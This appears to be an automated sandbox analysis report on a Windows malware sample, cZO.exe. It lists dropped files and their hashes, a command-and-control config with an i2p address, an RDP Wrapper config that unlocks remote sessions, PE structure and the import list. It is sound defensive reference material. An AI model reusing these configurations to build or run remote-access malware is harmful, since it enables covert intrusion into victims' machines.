                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92672
                                                                                                                                                Entropy (8bit):6.229119632298774
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                                                                                                                                                MD5:7FEA520E80E7A73252F2A5C204BBF820
                                                                                                                                                SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                                                                                                                                                SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                                                                                                                                                SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:Generic INItialization configuration [cnccli]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):213
                                                                                                                                                Entropy (8bit):5.129024990254676
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                                                                                                                                                MD5:7D88563AD41BAF4026CFC5D098CBF40D
                                                                                                                                                SHA1:442756834CCCEB84F219F3C762852437FBB3458E
                                                                                                                                                SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                                                                                                                                                SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:Generic INItialization configuration [SLPolicy]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):456534
                                                                                                                                                Entropy (8bit):5.450314708570292
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                                                                                                                                                MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                                                                                                                                                SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                                                                                                                                                SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                                                                                                                                                SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):104448
                                                                                                                                                Entropy (8bit):6.236071662185895
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                                                                                                                                                MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                                                                                                                                                SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                                                                                                                                                SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                                                                                                                                                SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:9:9
                                                                                                                                                MD5:006F29D8E822B9241020AEC2495EF819
                                                                                                                                                SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                                                                                                                                                SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                                                                                                                                                SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:wgNj
                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1835008
                                                                                                                                                Entropy (8bit):4.421587708065162
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:gSvfpi6ceLP/9skLmb0OTkWSPHaJG8nAgeMZMMhA2fX4WABlEnNl0uhiTw:LvloTkW+EZMM6DFy703w
                                                                                                                                                MD5:0CDD0EA720BA42B582F3FEE4EAA69CF0
                                                                                                                                                SHA1:ADD3142A279ED91C6963F125CC36AE5DC1CF1841
                                                                                                                                                SHA-256:E11E78F2AEE8741B86927A85F166F60577B947082B7C2667C76330A30F6ACFED
                                                                                                                                                SHA-512:CF82C8CAFE0C53AA7F73BE66E9306C13B72F9F44DCDD99513207583A1E341872651099E2A032431FD0F9A3F11D08A3B2461974685B11D4F27C64EF7E0BDCE307
                                                                                                                                                Malicious:false
                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Entropy (8bit):6.058145218584745
                                                                                                                                                TrID:
                                                                                                                                                • Win64 Executable GUI (202006/5) 92.64%
                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                • VXD Driver (31/22) 0.01%
                                                                                                                                                File name:cZO.exe
                                                                                                                                                File size:4'528'128 bytes
                                                                                                                                                MD5:be6e88537235ff3b6b61de70dfeecb3b
                                                                                                                                                SHA1:4a622aa9cbbb7f66484734b85a211f20e0cb0edd
                                                                                                                                                SHA256:bc1a44614123c841e31835919a21ed7322ea6537f6652f36d24fd7f83a440294
                                                                                                                                                SHA512:5e17c7a71828a17e662e34e87aee6ed1b4c5472f7d301d552b408ead7818f81fa6075626753f23ef1360cb0a61e8955ab31c120d81225a13906ced46253f5838
                                                                                                                                                SSDEEP:49152:eu4bU2JKwANXmSqoZ5N/cHgxSSQgsIifDGnjazY72RRCRX:hZwOYg0CRX
                                                                                                                                                TLSH:09263B3B726981ABC25DC53FC463CF30E933757E1B33C6E7529102688A569C59E3EA24
                                                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
                                                                                                                                                Icon Hash:6ab06e9aaaba8e50
                                                                                                                                                Entrypoint:0x756c70
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                DLL Characteristics:
                                                                                                                                                Time Stamp:0x6776E9FD [Thu Jan 2 19:33:17 2025 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:2
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:2
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:2
                                                                                                                                                Import Hash:c8a018b209e2afcd868eeb52f0439e7f
                                                                                                                                                Instruction
                                                                                                                                                push ebp
                                                                                                                                                dec eax
                                                                                                                                                sub esp, 20h
                                                                                                                                                dec eax
                                                                                                                                                mov ebp, esp
                                                                                                                                                nop
                                                                                                                                                dec eax
                                                                                                                                                lea ecx, dword ptr [FFFF0768h]
                                                                                                                                                call 00007F41CC3AEDB0h
                                                                                                                                                dec eax
                                                                                                                                                mov eax, dword ptr [0004BC54h]
                                                                                                                                                dec eax
                                                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                                                call 00007F41CC63FB41h
                                                                                                                                                dec eax
                                                                                                                                                mov eax, dword ptr [0004BC45h]
                                                                                                                                                dec eax
                                                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                                                mov dl, 01h
                                                                                                                                                call 00007F41CC6427F0h
                                                                                                                                                dec eax
                                                                                                                                                mov eax, dword ptr [0004BC34h]
                                                                                                                                                dec eax
                                                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                                                dec eax
                                                                                                                                                mov edx, dword ptr [FFFF00BAh]
                                                                                                                                                dec esp
                                                                                                                                                mov eax, dword ptr [0004C0B3h]
                                                                                                                                                call 00007F41CC63FB43h
                                                                                                                                                dec eax
                                                                                                                                                mov eax, dword ptr [0004BC17h]
                                                                                                                                                dec eax
                                                                                                                                                mov ecx, dword ptr [eax]
                                                                                                                                                call 00007F41CC63FD54h
                                                                                                                                                call 00007F41CC3A6D2Fh
                                                                                                                                                jmp 00007F41CC6EF85Ah
                                                                                                                                                nop
                                                                                                                                                nop
                                                                                                                                                call 00007F41CC3A6F26h
                                                                                                                                                nop
                                                                                                                                                dec eax
                                                                                                                                                lea esp, dword ptr [ebp+20h]
                                                                                                                                                pop ebp
                                                                                                                                                ret
                                                                                                                                                dec eax
                                                                                                                                                nop
                                                                                                                                                dec eax
                                                                                                                                                lea eax, dword ptr [00000000h+eax]
                                                                                                                                                dec eax
                                                                                                                                                sub esp, 28h
                                                                                                                                                call 00007F41CC3A64BCh
                                                                                                                                                dec eax
                                                                                                                                                add esp, 28h
                                                                                                                                                ret
                                                                                                                                                int3
                                                                                                                                                int3
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3b4000 | 0x9b | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3ae000 | 0x4736 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x412000 | 0x4f200 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x3e3000 | 0x2ee48 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3b7000 | 0x2b854 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x3b6000 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3af260 | 0x10d0 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3b3000 | 0xdfc | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x355d00 | 0x355e00 | feaead5986e94891814e1ff29aa912d8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x357000 | 0x4bfe0 | 0x4c000 | 58062ea28fd240adb3c58f126d326b08 | False | 0.23840010793585525 | data | 4.710133660344198 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x3a3000 | 0xa99c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x3ae000 | 0x4736 | 0x4800 | 1854ba5d3306b139579f7a8ff3cbd757 | False | 0.24424913194444445 | data | 4.374645528668736 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0x3b3000 | 0xdfc | 0xe00 | 3d6eff5550ae14066e23e41a1b4adadf | False | 0.26841517857142855 | data | 3.3090454102610942 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x3b4000 | 0x9b | 0x200 | f7c5bb68ad7d2f4a701d7e114bf654f1 | False | 0.259765625 | data | 1.917080347799001 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x3b5000 | 0x1e4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x3b6000 | 0x6d | 0x200 | c6496e53b0addf155e9246f44da4560b | False | 0.1953125 | data | 1.3902637598484393 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x3b7000 | 0x2b854 | 0x2ba00 | 3afb68c05ec358d7c6285f9a8b0a5197 | False | 0.46446879477077363 | data | 6.444856231549929 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.pdata | 0x3e3000 | 0x2ee48 | 0x2f000 | e24cc87fa0a02cee74658847ac8ccdad | False | 0.49283161569148937 | data | 6.319372177464017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x412000 | 0x4f200 | 0x4f200 | 15b10ae9b439df88df3be65b39ee9c6c | False | 0.6019111621248026 | data | 6.703548983868326 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x412b58 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x412c8c | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x412dc0 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x412ef4 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x413028 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x41315c | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x413290 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_ICON | 0x4133c4 | 0x4c28 | Device independent bitmap graphic, 128 x 256 x 8, image size 0 |  |  | 0.20460607304062373
RT_ICON | 0x417fec | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 |  |  | 0.4031791907514451
RT_ICON | 0x418554 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 |  |  | 0.6814079422382672
RT_ICON | 0x418dfc | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 |  |  | 0.517590618336887
RT_ICON | 0x419ca4 | 0x5c70 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9795892494929006
RT_STRING | 0x41f914 | 0x428 | data |  |  | 0.3693609022556391
RT_STRING | 0x41fd3c | 0x3f0 | data |  |  | 0.40773809523809523
RT_STRING | 0x42012c | 0x3d4 | data |  |  | 0.42448979591836733
RT_STRING | 0x420500 | 0x410 | data |  |  | 0.39903846153846156
RT_STRING | 0x420910 | 0x444 | data |  |  | 0.40934065934065933
RT_STRING | 0x420d54 | 0x340 | data |  |  | 0.41947115384615385
RT_STRING | 0x421094 | 0x39c | data |  |  | 0.34523809523809523
RT_STRING | 0x421430 | 0x264 | data |  |  | 0.5016339869281046
RT_STRING | 0x421694 | 0x47c | data |  |  | 0.3902439024390244
RT_STRING | 0x421b10 | 0x364 | data |  |  | 0.33410138248847926
RT_STRING | 0x421e74 | 0x414 | data |  |  | 0.40804597701149425
RT_STRING | 0x422288 | 0x10c | data |  |  | 0.6231343283582089
RT_STRING | 0x422394 | 0xcc | data |  |  | 0.6764705882352942
RT_STRING | 0x422460 | 0x29c | data |  |  | 0.468562874251497
RT_STRING | 0x4226fc | 0x3d0 | data |  |  | 0.3698770491803279
RT_STRING | 0x422acc | 0x3d4 | data |  |  | 0.37755102040816324
RT_STRING | 0x422ea0 | 0x4cc | data |  |  | 0.3135179153094462
RT_STRING | 0x42336c | 0x250 | data |  |  | 0.33952702702702703
RT_STRING | 0x4235bc | 0x414 | data |  |  | 0.4157088122605364
RT_STRING | 0x4239d0 | 0x4d4 | data |  |  | 0.3932038834951456
RT_STRING | 0x423ea4 | 0x490 | data |  |  | 0.3347602739726027
RT_STRING | 0x424334 | 0x390 | data |  |  | 0.34978070175438597
RT_STRING | 0x4246c4 | 0x458 | data |  |  | 0.38669064748201437
RT_STRING | 0x424b1c | 0x1ec | data |  |  | 0.3983739837398374
RT_STRING | 0x424d08 | 0xc4 | data |  |  | 0.6428571428571429
RT_STRING | 0x424dcc | 0x170 | data |  |  | 0.5597826086956522
RT_STRING | 0x424f3c | 0x334 | data |  |  | 0.41585365853658535
RT_STRING | 0x425270 | 0x408 | data |  |  | 0.3168604651162791
                                                                                                                                                RT_STRING0x4256780x38cdata0.3876651982378855
                                                                                                                                                RT_STRING0x425a040x2b4data0.4263005780346821
                                                                                                                                                RT_RCDATA0x425cb80x10data1.5
                                                                                                                                                RT_RCDATA0x425cc80xcacdata0.49506781750924783
                                                                                                                                                RT_RCDATA0x4269740x151Delphi compiled form 'TForm1'0.7210682492581603
                                                                                                                                                RT_RCDATA0x426ac80x3a205dataEnglishUnited States0.6415397862108071
                                                                                                                                                RT_GROUP_CURSOR0x460cd00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                RT_GROUP_CURSOR0x460ce40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                RT_GROUP_CURSOR0x460cf80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x460d0c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x460d200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x460d340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_CURSOR0x460d480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                RT_GROUP_ICON0x460d5c0x4cdata0.8289473684210527
                                                                                                                                                RT_VERSION0x460da80x314dataChineseChina0.45558375634517767
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll | CharNextW, LoadStringW
kernel32.dll | Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
kernel32.dll | GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
user32.dll | SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMetaRgn, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dll | WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathW, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CopyFileW, CompareStringW, CloseHandle
advapi32.dll | RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
oleaut32.dll | GetErrorInfo, SysFreeString
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
